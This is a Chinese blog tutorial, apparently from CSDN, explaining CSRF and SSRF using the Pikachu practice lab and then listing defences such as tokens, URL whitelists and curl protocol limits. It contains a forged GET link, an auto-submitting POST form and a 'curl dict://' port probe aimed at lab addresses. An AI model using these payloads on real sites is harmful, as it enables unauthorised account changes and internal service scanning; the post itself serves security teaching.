深入理解CSRF与SSRF攻击原理及防御措施

最新推荐文章于 2024-09-03 16:47:17 发布
最新推荐文章于 2024-09-03 16:47:17 发布
阅读量744 收藏 4
点赞数 15
文章标签: csrf 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71332744/article/details/140765072
版权

一、CSRF攻击原理及实例

  1. CSRF简介

CSRF(Cross-Site Request Forgery),即跨站请求伪造,是一种常见的网络攻击手段。攻击者利用已登录用户的cookie,在用户不知情的情况下,伪造请求执行特定操作。

  1. CSRF攻击实例
(1)GET类型攻击

首先,我们通过抓包获取到以下请求:

GET /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=abc&phonenum=18666666666&add=%17&email=l11%40qq.com&submit=submit HTTP/1.1
Host: 192.168.10.111

然后,构造恶意链接:

http://192.168.10.111/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=cba&phonenum=66666666&add=%17&email=6666@qq.com&submit=submit
(2)POST类型攻击

首先,抓包获取表单数据,然后构造以下前端代码:

<form action="http://192.168.10.111/pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="post">
    <input type="text" name="sex" value="girl">
    <input type="text" name="phonenum" value="1396969696">
    <input type="text" name="add" value="+76">
    <input type="text" name="email" value="6666@pikachu.com">
    <input type="submit" name="submit" value="submit" id="postsubmit">
</form>
<script>
    document.getElementById("postsubmit").click();
</script>

二、SSRF攻击原理及实例

  1. SSRF简介

SSRF(Server-Side Request Forgery),即服务器端请求伪造,攻击者通过构造特定的请求,让服务器端去访问其他网站资源。

  1. SSRF攻击实例

使用curl工具进行攻击,例如:

curl dict://192.168.10.143:21

这个请求可以探测服务器开启的服务和版本。

三、防御措施

  1. CSRF防御

为防止CSRF攻击,可以在表单中增加一个token字段,用于身份验证。

  1. SSRF防御
(1)白名单:只允许访问固定资源。
$_GET['url'] == 'http://127.0.0.1/pikachu/vul/ssrf/ssrf_info/info1.php'
(2)黑名单:禁止访问部分资源。
$_GET['url'] != '.....'
(3)限制curl函数可访问的协议。
curl_setopt($CH, CURLOPT_PROTOCOLS, CURLPROTO_HTTP|CURLPROTO_HTTPS);
王同学_116
关注
  • 15
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
5分钟科普CSRF攻击防御,Web安全的第一防线
01-27
目录: 一、CSRF介绍 二、CSRF攻击的危害 三、CSRF攻击原理及过程 四、CSRF漏洞检测 五、CSRF漏洞预防 六、最后聊聊xssCSR
CSRF攻击防御,Web安全的第一防线
01-27
CSRF(跨站请求伪造)攻击...总之,CSRF攻击是一种严重的安全威胁,开发者应当采取多种防御措施,如Token验证、Referer检查等,确保Web应用程序的安全性。同时,定期进行安全审计和漏洞扫描是预防CSRF攻击的关键步骤。
29 WEB漏洞-CSRFSSRF漏洞案例讲解-附件资源
03-02
29 WEB漏洞-CSRFSSRF漏洞案例讲解-附件资源
详解WEB攻击CSRF攻击与防护
02-23
CSRF定义:跨站请求伪造(英语:Cross-siterequestforgery),也被称为one-clickattack或者sessionriding,通常缩写为CSRF或者XSRF,是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。...
57-java csrf防御方案
weixin_41775999的博客
09-01 256
当用户请求一个创建表单的页面时,服务器会生成一个唯一的令牌,并将其保存在session中,然后在表单中插入这个令牌。当用户提交表单时,服务器会检查表单中的令牌与session中的令牌是否一致,如果一致,则认为是合法的请求。服务器在响应中发送一个名为X-CSRF-Token的头信息,并要求客户端在后续的请求中将其作为X-CSRF-Token头信息进行发送。CSRF(跨站请求伪造)是一种攻击手段,它迫使已登录用户的web应用在没有用户知情的情况下,发送未经授权的请求。通常,同步令牌是最简单且易于实现的方法。
【网络安全】Self XSS + 文件上传CSRF
最新发布
等风来
09-03 165
利用Burp Suite对请求进行了深入分析,发现文件上传操作会通过 `filename` 变量来传递上传文件的名称。我尝试在文件名中输入随机文本,试图找到反射点,但最初并没有任何效果。后来,我修改了文件的扩展名为“helloworld.fakeext”,成功触发了一个错误消息
通过组合Self-XSS + CSRF得到存储型XSS
2301_80115097的博客
09-03 271
在一次漏洞赏金挖掘中,我在更改用户名的功能点出发现了一个XSS,在修改用户名的地方添加了一个简单的XSS payload并且刷新页面.
从面向对象(OOP)到面向切面(AOP):编程范式的演变
妍思码匠的博客
08-30 1335
本文深入探讨了面向切面编程(AOP)在前端开发中的应用,解释了AOP如何通过动态增强与代码复用、降低模块间耦合度,为前端项目带来更高效、更模块化的解决方案。通过具体案例分析,如日志记录切面和动态埋点的实现,展示了如何利用装饰器模式、高阶组件等技术在前端实现AOP。理解AOP的原理与实践,将有助于开发者构建更易于维护和扩展的前端应用。无论你是前端新手还是资深开发者,本文都将为你提供有价值的见解和实用技巧。
深入理解JavaScript闭包:避免常见的内存泄漏问题
官方推荐
09-02 3274
深入理解JavaScript闭包:避免常见的内存泄漏问题
WHAT - React 函数与 useMemo vs useCallback
weixin_58540586的博客
09-03 426
目录介绍`useMemo` 与 `useCallback` 的区别示例代码`useMemo` 示例`useCallback` 示例总结 介绍 在 React 中,useMemo 和 useCallback 是两个用于性能优化的钩子,尽管它们有些相似,但各自有不同的用途和应用场景。理解它们的区别和适用情况可以帮助你更有效地管理组件的性能和状态。 useMemo 与 useCallback 的区别 useMemo: 目的: 用于记忆化(缓存)计算结果。它接受一个计算函数和依赖项数组,只有当依赖项发生变化时
材料表面缺陷检测系统源码分享 # [一条龙教学YOLOV8标注好的数据集一键训练_70+全套改进创新点发刊_Web前端展示]
xuehai996的博客
08-29 2385
材料表面缺陷检测系统源码分享 # [一条龙教学YOLOV8标注好的数据集一键训练_70+全套改进创新点发刊_Web前端展示]
KEYSIGHT是德 Infiniium EXR系列 示波器
XLTYQYB的博客
08-29 1415
该系列的所有型号都集成了一个 10 位 ADC,并且在所有通道上同时提供 16 GSa/s 的采样率。高分辨率 ADC 的效用取决于示波器的前端底噪是否足够低以提供与之匹配的额外的量化电平空间。我们的低噪声前 端包含定制 IC,例如 130 纳米 BiCMOS IC(其中集成了用户可选的模拟滤波器),并且带宽可通过软件 许可证升级。使用硬件滤波时,噪声低至 43 μV,系统 ENOB 达到 9.0 位。Infiniium EXR系列 示波器 型号比较。垂直分辨率是 8 位示波器的 4 倍。
vue3+ts封装一个uniapp的自动滚动列表,实现看板效果
qq_51384850的博客
08-31 878
自行配置滚动时间,滚动的高度默认为一行数据的高度,当数据更新的时候,会对新旧数据进行比较,在旧数据的基础上删除解除异常了的数据,将新增异常数据加到数据的最顶部,重新开始从顶部滚动,实现数据在电视机上的实时刷新和展示
vue3+vant4父组件点击提交并校验子组件form表单
liuzaixi的博客
08-30 447
方法进行表单验证,如果验证通过则执行提交逻辑。获取子组件的引用,在父组件的点击事件中调用子组件的。这样父组件就可以通过。调用子组件的验证方法了。
Nginx部署前端Vue项目
不会代码的小林
09-03 353
Nginx是一款轻量级的高性能Web服务器,可以用于静态文件的托管和反向代理等场景。现在,您可以在浏览器中访问http://example.com(请替换为您自己的域名),应该可以看到Vue应用程序正在运行。请将example.com替换为您自己的域名,将/var/www/my-project/dist替换为Vue项目的dist目录的实际路径。现在,我们需要配置Nginx来托管Vue项目的静态文件。接下来,我们可以使用Vue CLI创建一个新的Vue项目。在部署之前,我们需要先构建Vue项目。
springblade-JWT认证缺陷漏洞CVE-2021-44910
m0_73756016的博客
09-03 262
大概意思就是这个认证判断有个逻辑缺陷,就是在泄露的前端pack里面对于jwt的判断认证不够严谨,并且加密的TokenConstant.SIGN_KEY也泄漏了。直接搜索“请求未授权”,定位到认证文件:springblade/gateway/filter/AuthFilter.java。/api/blade-log/api/list接口中会泄漏账号密码,只要管理员登录过。/api/blade-user/user-list泄露了账号密码。然后直接访问接口:api/blade-log/api/list。
浅析前端数据埋点监控:用户行为与性能分析的桥梁
dsgdauigfs的博客
09-03 679
总的来说,前端埋点技术不仅是提升用户体验和产品运行效率的利器,更是实现数据驱动决策的重要工具。随着各类专业工具的出现,如腾讯有数、百度统计和微软Clarity,企业可以根据需求选择最适合的工具进行数据分析和优化,从而在竞争激烈的市场中保持领先地位。通过深入理解用户行为和性能数据,企业能够做出更明智的决策,推动业务持续发展,实现长期成功。通过本文的介绍,希望能够帮助前端开发者和产品团队更好地理解数据埋点的重要性,掌握实施数据埋点的方法,从而在实际工作中发挥其最大的价值。努力的小雨。
Haproxy搭建Web群集
pangdongqiqi的博客
08-29 714
默认haproxy的日志是输出到系统的syslog中,查看起来不是非常方便,为了更好的管理haproxy的日志,我们在生产环境中一般单独定义出来。需要将haproxy的info及notice日志分别记录到不同的日志文件中。global#需要修改rsyslog配置,为了便于管理。将haproxy相关的配置独立定义到haproxy.conf,并放到/etc/rsyslog.d/下,rsyslog启动时会自动加载此目录下的所有配置文件。
理解CSRF攻击原理、危害与防御策略
"本文详细介绍了CSRF(跨站请求伪造)攻击的概念、危害、攻击原理以及防御策略,旨在提升Web应用的安全性。" CSRF攻击是一种常见的网络安全威胁,它利用了用户浏览器的已登录状态,使得攻击者能够在用户不知情的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值